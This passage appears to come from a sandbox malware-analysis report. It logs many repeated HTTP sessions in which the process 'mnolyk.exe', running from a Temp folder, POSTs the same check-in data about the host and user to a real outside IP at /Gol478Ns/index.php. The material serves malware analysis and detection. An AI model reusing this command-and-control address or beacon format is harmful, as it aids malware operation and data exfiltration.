                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.438237906 CET | 962 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      503 | 192.168.2.7 | 50231 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:14.609316111 CET | 963 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.672333002 CET | 963 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      504 | 192.168.2.7 | 50232 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:14.844485998 CET | 964 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.907803059 CET | 964 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      505 | 192.168.2.7 | 50233 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:15.078905106 CET | 965 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.144630909 CET | 965 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      506 | 192.168.2.7 | 50234 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:15.320717096 CET | 966 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.384686947 CET | 966 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      507 | 192.168.2.7 | 50235 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:15.569377899 CET | 967 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.633167982 CET | 967 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      508 | 192.168.2.7 | 50236 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:15.815188885 CET | 968 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.879889965 CET | 968 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      509 | 192.168.2.7 | 50237 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:16.048099041 CET | 969 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.114763975 CET | 969 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      51 | 192.168.2.7 | 49775 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:09.999213934 CET | 483 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.066962004 CET | 483 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      510 | 192.168.2.7 | 50238 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:16.299287081 CET | 970 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.364350080 CET | 970 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      511 | 192.168.2.7 | 50239 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:16.554900885 CET | 971 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.617705107 CET | 971 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      512 | 192.168.2.7 | 50240 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:16.797444105 CET | 972 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.862142086 CET | 972 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      513 | 192.168.2.7 | 50241 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:17.040111065 CET | 973 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.107961893 CET | 973 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      514 | 192.168.2.7 | 50242 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:17.282352924 CET | 974 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.346925020 CET | 974 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      515 | 192.168.2.7 | 50243 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:17.517771959 CET | 975 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.582851887 CET | 975 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      516 | 192.168.2.7 | 50244 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:17.760139942 CET | 976 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.822911024 CET | 976 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      517 | 192.168.2.7 | 50245 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:18.033799887 CET | 977 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.099890947 CET | 977 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      518 | 192.168.2.7 | 50246 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:18.266166925 CET | 978 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.329782963 CET | 978 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      519 | 192.168.2.7 | 50247 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:18.501382113 CET | 979 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.565172911 CET | 979 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
